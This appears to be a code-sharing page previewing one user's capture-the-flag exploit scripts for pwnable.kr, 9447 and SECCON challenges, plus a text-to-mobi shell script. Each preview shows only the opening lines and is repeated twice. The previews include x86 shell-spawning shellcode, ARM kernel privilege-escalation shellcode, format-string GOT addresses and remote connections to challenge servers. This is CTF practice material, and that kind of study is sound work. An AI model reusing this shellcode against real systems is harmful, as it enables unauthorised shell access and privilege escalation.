Cubarco cubarco

## pwnable-toddlersbottle-input.py
#!/usr/bin/env python
# coding=utf8

'''
    Copy this file to /tmp, and run. That's all.
'''

import os
import socket
import random

## pwnable-toddlersbottle-coin1.py
#!/usr/bin/env python
# coding=utf8

'''
    Copy this file to /tmp, and run it.
'''

import socket
import re
import sys

## pwnable-toddlersbottle-blackjack.py
#!/usr/bin/env python
# coding=utf8

import socket
import re
import sys


def debug(string):
    print '\033[92m' + '[DEBUG] ' + '\033[0m' + string

## 9447-calcpop-reloaded.py
#!/usr/bin/env python
# coding=utf8

from pwn import p32, remote, context, asm, shellcraft

import sys

context.arch = 'i386'

p = remote('localhost', 9447)

## 9447-calcpop.py
#!/usr/bin/env python
# coding=utf8

from pwn import process, p32, remote

p = process("./calcpop")
#p = remote('calcpop-4gh07blg.9447.plumbing', 9447)

print p.recvline()

## 2015-seccon-treewalker.py
#!/usr/bin/env python
# coding=utf8

from pwn import context, p64, process, remote
from struct import unpack

context.arch = 'amd64'

# p = process('./treewalker')
p = remote('treewalker.pwn.seccon.jp', 20000)

## pwnable-rookiss-fsb.py
#!/usr/bin/env python
# coding=utf8

from pwn import process
from time import sleep

p = process('./fsb')

read_got = 0x804a000
congratz_addr = 0x804869f

## pwnable-rookiss-tiny-easy.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

char *shellcode = \
     "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
     "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
     "\x6e\x2f\x73\x68";

## txt2mobi.sh
#!/usr/bin/env bash

if [ "$#" -ne 2 ]; then
    echo "usage: $0 IN_FILE OUT_FILE"
    exit
fi

infile=$1; shift
outfile=$1
title=${infile%.*}

## 1-pwnable-rookiss-syscall.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";

char addr1[] = "\xfe\xca\xf5\x83";
char addr2[] = "\xee\xbe\xf6\x83";
	#!/usr/bin/env python
	# coding=utf8

	'''
	Copy this file to /tmp, and run. That's all.
	'''

	import os
	import socket
	import random
	#!/usr/bin/env python
	# coding=utf8

	'''
	Copy this file to /tmp, and run it.
	'''

	import socket
	import re
	import sys
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p32, remote, context, asm, shellcraft

	import sys

	context.arch = 'i386'

	p = remote('localhost', 9447)
	#!/usr/bin/env python
	# coding=utf8

	from pwn import process, p32, remote

	p = process("./calcpop")
	#p = remote('calcpop-4gh07blg.9447.plumbing', 9447)

	print p.recvline()
	#!/usr/bin/env python
	# coding=utf8

	from pwn import context, p64, process, remote
	from struct import unpack

	context.arch = 'amd64'

	# p = process('./treewalker')
	p = remote('treewalker.pwn.seccon.jp', 20000)
	#!/usr/bin/env python
	# coding=utf8

	from pwn import process
	from time import sleep

	p = process('./fsb')

	read_got = 0x804a000
	congratz_addr = 0x804869f
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/wait.h>

	char *shellcode = \
	"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
	"\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
	"\x6e\x2f\x73\x68";
	#!/usr/bin/env bash

	if [ "$#" -ne 2 ]; then
	echo "usage: $0 IN_FILE OUT_FILE"
	exit
	fi

	infile=$1; shift
	outfile=$1
	title=${infile%.*}
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>

	char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
	char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";

	char addr1[] = "\xfe\xca\xf5\x83";
	char addr2[] = "\xee\xbe\xf6\x83";